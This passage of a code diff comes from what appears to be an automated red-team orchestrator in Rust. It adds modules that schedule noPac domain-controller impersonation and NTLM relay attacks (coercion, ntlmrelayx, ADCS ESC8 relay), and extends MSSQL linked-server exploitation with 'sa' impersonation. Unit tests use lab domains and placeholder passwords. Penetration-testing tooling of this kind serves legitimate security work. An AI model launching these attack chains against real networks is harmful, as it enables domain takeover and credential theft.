l.uses_self_credential, l.remote_name FROM sys.servers s LEFT JOIN sys.linked_logins l ON s.server_id = l.server_id; — if `is_rpc_out_enabled=1` and `uses_self_credential=0`, use `mssql_openquery` (rides stored login mapping, bypasses double-hop)", + "If `mssql_exec_linked` fails on a cross-forest link with auth errors, retry with `impersonate_user='sa'` to wrap the hop in `EXECUTE AS LOGIN`, or switch to `mssql_openquery`", ], }); @@ -192,7 +218,7 @@ struct MssqlDeepWork { /// MSSQL exploitation (follow-up on confirmed MSSQL access). pub(crate) fn is_mssql_deep_candidate(vuln_type: &str) -> bool { let vtype = vuln_type.to_lowercase(); - vtype == "mssql_access" || vtype == "mssql_linked_server" + vtype == "mssql_access" || vtype == "mssql_linked_server" || vtype == "mssql_impersonation" } /// Extract the target IP from vulnerability details, with fallbacks. @@ -227,11 +253,12 @@ mod tests { assert!(is_mssql_deep_candidate("MSSQL_ACCESS")); assert!(is_mssql_deep_candidate("mssql_linked_server")); assert!(is_mssql_deep_candidate("MSSQL_LINKED_SERVER")); + assert!(is_mssql_deep_candidate("mssql_impersonation")); + assert!(is_mssql_deep_candidate("MSSQL_IMPERSONATION")); } #[test] fn is_mssql_deep_candidate_negative() { - assert!(!is_mssql_deep_candidate("mssql_impersonation")); assert!(!is_mssql_deep_candidate("rbcd")); assert!(!is_mssql_deep_candidate("esc1")); assert!(!is_mssql_deep_candidate("")); diff --git a/ares-cli/src/orchestrator/automation/nopac.rs b/ares-cli/src/orchestrator/automation/nopac.rs new file mode 100644 index 00000000..dac662c2 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/nopac.rs @@ -0,0 +1,384 @@ +//! auto_nopac -- exploit CVE-2021-42287/CVE-2021-42278 (noPac / SamAccountName +//! spoofing) when conditions are met. +//! +//! noPac creates a computer account, renames it to match a DC, requests a TGT, +//! then restores the name. The TGT now impersonates the DC, enabling DCSync. +//! Requires: valid domain credentials, MAQ > 0 (default 10), unpatched DCs. +//! +//! The worker has a `nopac` tool that wraps the full chain. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect noPac work items from state (pure logic, no async). +fn collect_nopac_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + // Skip domains we already dominate -- noPac is pointless if we have krbtgt + if state.dominated_domains.contains(&domain.to_lowercase()) { + continue; + } + + // Find a credential for this domain + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + { + Some(c) => c.clone(), + None => continue, + }; + + let dedup_key = format!("nopac:{}:{}", domain.to_lowercase(), dc_ip); + if state.is_processed(DEDUP_NOPAC, &dedup_key) { + continue; + } + + items.push(NopacWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Monitors for noPac exploitation opportunities. +/// Dispatches against each DC+credential pair once. +/// Interval: 45s (low-priority CVE check). +pub async fn auto_nopac(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("nopac") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_nopac_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "nopac", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("nopac"); + match dispatcher + .throttled_submit("exploit", "privesc", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + dc = %item.dc_ip, + domain = %item.domain, + "noPac (CVE-2021-42287) exploitation dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_NOPAC, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_NOPAC, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(dc = %item.dc_ip, "noPac task deferred by throttler"); + } + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch noPac"); + } + } + } + } +} + +struct NopacWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("nopac:{}:{}", "contoso.local", "192.168.58.10"); + assert_eq!(key, "nopac:contoso.local:192.168.58.10"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!( + "nopac:{}:{}", + "CONTOSO.LOCAL".to_lowercase(), + "192.168.58.10" + ); + assert_eq!(key, "nopac:contoso.local:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_NOPAC, "nopac"); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "nopac", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "nopac"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = NopacWork { + dedup_key: "nopac:contoso.local:192.168.58.10".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "nopac:contoso.local:192.168.58.10"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn dedup_key_case_normalization() { + let domain = "CONTOSO.LOCAL"; + let dc_ip = "192.168.58.10"; + let key = format!("nopac:{}:{}", domain.to_lowercase(), dc_ip); + assert_eq!(key, "nopac:contoso.local:192.168.58.10"); + + let domain2 = "Fabrikam.Local"; + let key2 = format!("nopac:{}:{}", domain2.to_lowercase(), "192.168.58.20"); + assert_eq!(key2, "nopac:fabrikam.local:192.168.58.20"); + } + + // --- collect_nopac_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_nopac_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_nopac_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dc_with_matching_cred_produces_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_nopac_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].dedup_key, "nopac:contoso.local:192.168.58.10"); + } + + #[test] + fn collect_skips_dominated_domain() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state.dominated_domains.insert("contoso.local".into()); + let work = collect_nopac_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_no_matching_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Credential for different domain, noPac requires exact domain match + state.credentials.push(make_cred("admin", "fabrikam.local")); + let work = collect_nopac_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_already_processed_dedup() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_NOPAC, "nopac:contoso.local:192.168.58.10".into()); + let work = collect_nopac_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_domains_produces_multiple_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state + .credentials + .push(make_cred("fabadmin", "fabrikam.local")); + let work = collect_nopac_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_case_insensitive_domain_match() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_nopac_work(&state); + assert_eq!(work.len(), 1); + } + + #[test] + fn domain_matching_for_credential_selection() { + let cred_contoso = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let cred_fabrikam = ares_core::models::Credential { + id: "c2".into(), + username: "fabadmin".into(), + password: "FabPass!".into(), // pragma: allowlist secret + domain: "fabrikam.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let creds = [cred_contoso, cred_fabrikam]; + let target_domain = "fabrikam.local"; + + let matched = creds + .iter() + .find(|c| c.domain.to_lowercase() == target_domain.to_lowercase()); + assert!(matched.is_some()); + assert_eq!(matched.unwrap().username, "fabadmin"); + } +} diff --git a/ares-cli/src/orchestrator/automation/ntlm_relay.rs b/ares-cli/src/orchestrator/automation/ntlm_relay.rs new file mode 100644 index 00000000..75e57b1b --- /dev/null +++ b/ares-cli/src/orchestrator/automation/ntlm_relay.rs @@ -0,0 +1,850 @@ +//! auto_ntlm_relay -- orchestrate NTLM relay attacks when conditions are met. +//! +//! NTLM relay requires two sides: a relay listener (ntlmrelayx) and a coercion +//! trigger (PetitPotam, PrinterBug, scheduled task bots). This module dispatches +//! relay attacks when: +//! +//! 1. SMB signing is disabled on a target (relay destination) +//! 2. An ADCS web enrollment endpoint exists (ESC8 relay target) +//! 3. We have credentials to trigger coercion or a known coercion source +//! +//! The worker agent coordinates ntlmrelayx + coercion within a single task. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Dedup key prefix for relay attacks. +const DEDUP_SET: &str = DEDUP_NTLM_RELAY; + +/// Monitors for NTLM relay opportunities and dispatches relay attacks. +/// Interval: 30s. +pub async fn auto_ntlm_relay(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("ntlm_relay") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, + }; + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_relay_work(&state, &listener) + }; + + for item in work { + let payload = match &item.relay_type { + RelayType::SmbToLdap => json!({ + "technique": "ntlm_relay_ldap", + "relay_target": item.relay_target, + "listener_ip": item.listener, + "coercion_source": item.coercion_source, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }), + RelayType::Esc8 { ca_name, domain } => json!({ + "technique": "ntlm_relay_adcs", + "relay_target": item.relay_target, + "listener_ip": item.listener, + "ca_name": ca_name, + "domain": domain, + "coercion_source": item.coercion_source, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }), + }; + + let priority = dispatcher.effective_priority("ntlm_relay"); + match dispatcher + .throttled_submit("coercion", "coercion", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + relay_target = %item.relay_target, + relay_type = %item.relay_type, + "NTLM relay attack dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SET, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SET, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(relay = %item.relay_target, "NTLM relay task deferred by throttler"); + } + Err(e) => { + warn!(err = %e, relay = %item.relay_target, "Failed to dispatch NTLM relay"); + } + } + } + } +} + +/// Collect relay work items from current state. +/// +/// Pure logic extracted from `auto_ntlm_relay` so it can be unit-tested without +/// needing a `Dispatcher` or async runtime (beyond state construction). +fn collect_relay_work( + state: &crate::orchestrator::state::StateInner, + listener: &str, +) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + // Path 1: Relay to hosts with SMB signing disabled → LDAP shadow creds / RBCD + for vuln in state.discovered_vulnerabilities.values() { + if vuln.vuln_type.to_lowercase() != "smb_signing_disabled" { + continue; + } + if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { + continue; + } + + let target_ip = vuln + .details + .get("target_ip") + .or_else(|| vuln.details.get("ip")) + .and_then(|v| v.as_str()) + .unwrap_or(&vuln.target); + + if target_ip.is_empty() { + continue; + } + + let relay_key = format!("smb_relay:{target_ip}"); + if state.is_processed(DEDUP_SET, &relay_key) { + continue; + } + + let coercion_source = find_coercion_source(&state.domain_controllers, |ip| { + state.is_processed(DEDUP_COERCED_DCS, ip) + }); + + let cred = match state.credentials.first() { + Some(c) => c.clone(), + None => continue, + }; + + items.push(RelayWork { + dedup_key: relay_key, + relay_type: RelayType::SmbToLdap, + relay_target: target_ip.to_string(), + coercion_source, + listener: listener.to_string(), + credential: cred, + }); + } + + // Path 2: Relay to ADCS web enrollment (ESC8) + for vuln in state.discovered_vulnerabilities.values() { + let vtype = vuln.vuln_type.to_lowercase(); + if vtype != "esc8" && vtype != "adcs_web_enrollment" { + continue; + } + if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { + continue; + } + + let ca_host = vuln + .details + .get("ca_host") + .or_else(|| vuln.details.get("target_ip")) + .and_then(|v| v.as_str()) + .unwrap_or(&vuln.target); + + if ca_host.is_empty() { + continue; + } + + let relay_key = format!("esc8_relay:{ca_host}"); + if state.is_processed(DEDUP_SET, &relay_key) { + continue; + } + + let coercion_source = find_coercion_source(&state.domain_controllers, |ip| { + state.is_processed(DEDUP_COERCED_DCS, ip) + }); + + let cred = match state.credentials.first() { + Some(c) => c.clone(), + None => continue, + }; + + let ca_name = vuln + .details + .get("ca_name") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + + let domain = vuln + .details + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + + items.push(RelayWork { + dedup_key: relay_key, + relay_type: RelayType::Esc8 { ca_name, domain }, + relay_target: ca_host.to_string(), + coercion_source, + listener: listener.to_string(), + credential: cred, + }); + } + + items +} + +/// Find the best coercion source (a DC IP we can PetitPotam/PrinterBug). +/// +/// Takes the domain_controllers map and a closure to check dedup state, +/// keeping us decoupled from `StateInner`'s module visibility. +fn find_coercion_source( + domain_controllers: &std::collections::HashMap, + is_processed: impl Fn(&str) -> bool, +) -> Option { + // Prefer a DC we haven't already coerced + domain_controllers + .values() + .find(|ip| !is_processed(ip)) + .or_else(|| domain_controllers.values().next()) + .cloned() +} + +struct RelayWork { + dedup_key: String, + relay_type: RelayType, + relay_target: String, + coercion_source: Option, + listener: String, + credential: ares_core::models::Credential, +} + +enum RelayType { + SmbToLdap, + Esc8 { ca_name: String, domain: String }, +} + +impl std::fmt::Display for RelayType { + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { + match self { + Self::SmbToLdap => write!(f, "smb_to_ldap"), + Self::Esc8 { .. } => write!(f, "esc8_adcs"), + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use std::collections::HashMap; + + #[test] + fn relay_type_display() { + assert_eq!(RelayType::SmbToLdap.to_string(), "smb_to_ldap"); + assert_eq!( + RelayType::Esc8 { + ca_name: "CA".into(), + domain: "contoso.local".into() + } + .to_string(), + "esc8_adcs" + ); + } + + #[test] + fn dedup_key_format_smb() { + let key = format!("smb_relay:{}", "192.168.58.22"); + assert_eq!(key, "smb_relay:192.168.58.22"); + } + + #[test] + fn dedup_key_format_esc8() { + let key = format!("esc8_relay:{}", "192.168.58.10"); + assert_eq!(key, "esc8_relay:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_SET, "ntlm_relay"); + } + + #[test] + fn find_coercion_source_prefers_unprocessed() { + let mut dcs = HashMap::new(); + dcs.insert("contoso.local".into(), "192.168.58.10".into()); + dcs.insert("fabrikam.local".into(), "192.168.58.20".into()); + + // First DC already processed, second not + let result = find_coercion_source(&dcs, |ip| ip == "192.168.58.10"); + assert!(result.is_some()); + assert_eq!(result.unwrap(), "192.168.58.20"); + } + + #[test] + fn find_coercion_source_falls_back_to_any() { + let mut dcs = HashMap::new(); + dcs.insert("contoso.local".into(), "192.168.58.10".into()); + + // All processed, still returns one + let result = find_coercion_source(&dcs, |_| true); + assert!(result.is_some()); + assert_eq!(result.unwrap(), "192.168.58.10"); + } + + #[test] + fn find_coercion_source_empty_map() { + let dcs = HashMap::new(); + let result = find_coercion_source(&dcs, |_| false); + assert!(result.is_none()); + } + + #[test] + fn esc8_vuln_type_matching() { + let types = ["esc8", "adcs_web_enrollment", "ESC8", "ADCS_WEB_ENROLLMENT"]; + for t in &types { + let vtype = t.to_lowercase(); + assert!( + vtype == "esc8" || vtype == "adcs_web_enrollment", + "{t} should match" + ); + } + } + + #[test] + fn smb_signing_vuln_type_matching() { + let vtype = "smb_signing_disabled".to_lowercase(); + assert_eq!(vtype, "smb_signing_disabled"); + + let not_smb = "mssql_access".to_lowercase(); + assert_ne!(not_smb, "smb_signing_disabled"); + } + + #[test] + fn relay_work_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = RelayWork { + dedup_key: "smb_relay:192.168.58.22".into(), + relay_type: RelayType::SmbToLdap, + relay_target: "192.168.58.22".into(), + coercion_source: Some("192.168.58.10".into()), + listener: "192.168.58.100".into(), + credential: cred.clone(), + }; + assert_eq!(work.relay_target, "192.168.58.22"); + assert_eq!(work.listener, "192.168.58.100"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn smb_to_ldap_payload_structure() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "ntlm_relay_ldap", + "relay_target": "192.168.58.22", + "listener_ip": "192.168.58.100", + "coercion_source": "192.168.58.10", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "ntlm_relay_ldap"); + assert_eq!(payload["relay_target"], "192.168.58.22"); + assert_eq!(payload["listener_ip"], "192.168.58.100"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn esc8_payload_structure() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let relay_type = RelayType::Esc8 { + ca_name: "contoso-CA".into(), + domain: "contoso.local".into(), + }; + let payload = json!({ + "technique": "ntlm_relay_adcs", + "relay_target": "192.168.58.10", + "listener_ip": "192.168.58.100", + "ca_name": "contoso-CA", + "domain": "contoso.local", + "coercion_source": "192.168.58.20", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "ntlm_relay_adcs"); + assert_eq!(payload["ca_name"], "contoso-CA"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(relay_type.to_string(), "esc8_adcs"); + } + + #[test] + fn target_ip_extraction_from_vuln_details() { + let details = serde_json::json!({"target_ip": "192.168.58.22", "ip": "192.168.58.23"}); + let fallback = "192.168.58.99"; + let target = details + .get("target_ip") + .or_else(|| details.get("ip")) + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(target, "192.168.58.22"); + } + + #[test] + fn target_ip_fallback_to_ip_field() { + let details = serde_json::json!({"ip": "192.168.58.23"}); + let fallback = "192.168.58.99"; + let target = details + .get("target_ip") + .or_else(|| details.get("ip")) + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(target, "192.168.58.23"); + } + + #[test] + fn target_ip_fallback_to_vuln_target() { + let details = serde_json::json!({}); + let fallback = "192.168.58.99"; + let target = details + .get("target_ip") + .or_else(|| details.get("ip")) + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(target, "192.168.58.99"); + } + + #[test] + fn ca_host_extraction_fallback() { + let details = serde_json::json!({"ca_host": "192.168.58.10"}); + let fallback = "192.168.58.99"; + let ca_host = details + .get("ca_host") + .or_else(|| details.get("target_ip")) + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(ca_host, "192.168.58.10"); + + let details2 = serde_json::json!({"target_ip": "192.168.58.20"}); + let ca_host2 = details2 + .get("ca_host") + .or_else(|| details2.get("target_ip")) + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(ca_host2, "192.168.58.20"); + } + + #[test] + fn ca_name_extraction() { + let details = serde_json::json!({"ca_name": "contoso-CA"}); + let ca_name = details + .get("ca_name") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + assert_eq!(ca_name, "contoso-CA"); + + let details2 = serde_json::json!({}); + let ca_name2 = details2 + .get("ca_name") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + assert_eq!(ca_name2, ""); + } + + #[test] + fn find_coercion_source_all_unprocessed() { + let mut dcs = HashMap::new(); + dcs.insert("contoso.local".into(), "192.168.58.10".into()); + dcs.insert("fabrikam.local".into(), "192.168.58.20".into()); + + let result = find_coercion_source(&dcs, |_| false); + assert!(result.is_some()); + } + + #[test] + fn relay_type_display_exhaustive() { + let smb = RelayType::SmbToLdap; + assert_eq!(format!("{smb}"), "smb_to_ldap"); + + let esc8 = RelayType::Esc8 { + ca_name: String::new(), + domain: String::new(), + }; + assert_eq!(format!("{esc8}"), "esc8_adcs"); + } + + // --- collect_relay_work integration tests --- + + use crate::orchestrator::state::SharedState; + + fn make_cred() -> ares_core::models::Credential { + ares_core::models::Credential { + id: "c1".into(), + username: "svcadmin".into(), + password: "S3cure!Pass".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "kerberoast".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_smb_vuln(id: &str, target_ip: &str) -> ares_core::models::VulnerabilityInfo { + let mut details = HashMap::new(); + details.insert( + "target_ip".to_string(), + serde_json::Value::String(target_ip.to_string()), + ); + ares_core::models::VulnerabilityInfo { + vuln_id: id.to_string(), + vuln_type: "smb_signing_disabled".to_string(), + target: target_ip.to_string(), + discovered_by: "scanner".to_string(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 5, + } + } + + fn make_esc8_vuln( + id: &str, + ca_host: &str, + ca_name: &str, + domain: &str, + ) -> ares_core::models::VulnerabilityInfo { + let mut details = HashMap::new(); + details.insert( + "ca_host".to_string(), + serde_json::Value::String(ca_host.to_string()), + ); + details.insert( + "ca_name".to_string(), + serde_json::Value::String(ca_name.to_string()), + ); + details.insert( + "domain".to_string(), + serde_json::Value::String(domain.to_string()), + ); + ares_core::models::VulnerabilityInfo { + vuln_id: id.to_string(), + vuln_type: "esc8".to_string(), + target: ca_host.to_string(), + discovered_by: "scanner".to_string(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 8, + } + } + + #[tokio::test] + async fn collect_relay_work_empty_state() { + let shared = SharedState::new("test".into()); + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!(work.is_empty(), "empty state should produce no work"); + } + + #[tokio::test] + async fn collect_relay_work_no_credentials() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!(work.is_empty(), "no credentials should produce no work"); + } + + #[tokio::test] + async fn collect_relay_work_smb_signing_disabled() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "smb_relay:192.168.58.22"); + assert_eq!(work[0].relay_target, "192.168.58.22"); + assert_eq!(work[0].listener, "192.168.58.100"); + assert!(matches!(work[0].relay_type, RelayType::SmbToLdap)); + assert_eq!(work[0].coercion_source, Some("192.168.58.10".into())); + assert_eq!(work[0].credential.username, "svcadmin"); + } + + #[tokio::test] + async fn collect_relay_work_esc8_vuln() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities.insert( + "v2".into(), + make_esc8_vuln("v2", "192.168.58.30", "contoso-CA", "contoso.local"), + ); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "esc8_relay:192.168.58.30"); + assert_eq!(work[0].relay_target, "192.168.58.30"); + match &work[0].relay_type { + RelayType::Esc8 { ca_name, domain } => { + assert_eq!(ca_name, "contoso-CA"); + assert_eq!(domain, "contoso.local"); + } + _ => panic!("expected Esc8 relay type"), + } + // No DCs configured → coercion_source is None + assert!(work[0].coercion_source.is_none()); + } + + #[tokio::test] + async fn collect_relay_work_skips_already_processed_dedup() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + // Mark the relay key as already processed + s.mark_processed(DEDUP_SET, "smb_relay:192.168.58.22".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!( + work.is_empty(), + "already-processed dedup key should be skipped" + ); + } + + #[tokio::test] + async fn collect_relay_work_skips_exploited_vulns() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + s.exploited_vulnerabilities.insert("v1".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!(work.is_empty(), "exploited vulns should be skipped"); + } + + #[tokio::test] + async fn collect_relay_work_multiple_vulns() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + s.discovered_vulnerabilities + .insert("v2".into(), make_smb_vuln("v2", "192.168.58.23")); + s.discovered_vulnerabilities.insert( + "v3".into(), + make_esc8_vuln("v3", "192.168.58.30", "contoso-CA", "contoso.local"), + ); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 3, "should produce work for all 3 vulns"); + + let smb_count = work + .iter() + .filter(|w| matches!(w.relay_type, RelayType::SmbToLdap)) + .count(); + let esc8_count = work + .iter() + .filter(|w| matches!(w.relay_type, RelayType::Esc8 { .. })) + .count(); + assert_eq!(smb_count, 2); + assert_eq!(esc8_count, 1); + } + + #[tokio::test] + async fn collect_relay_work_ignores_unrelated_vuln_types() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + // Add an unrelated vuln type + let mut details = HashMap::new(); + details.insert( + "target_ip".to_string(), + 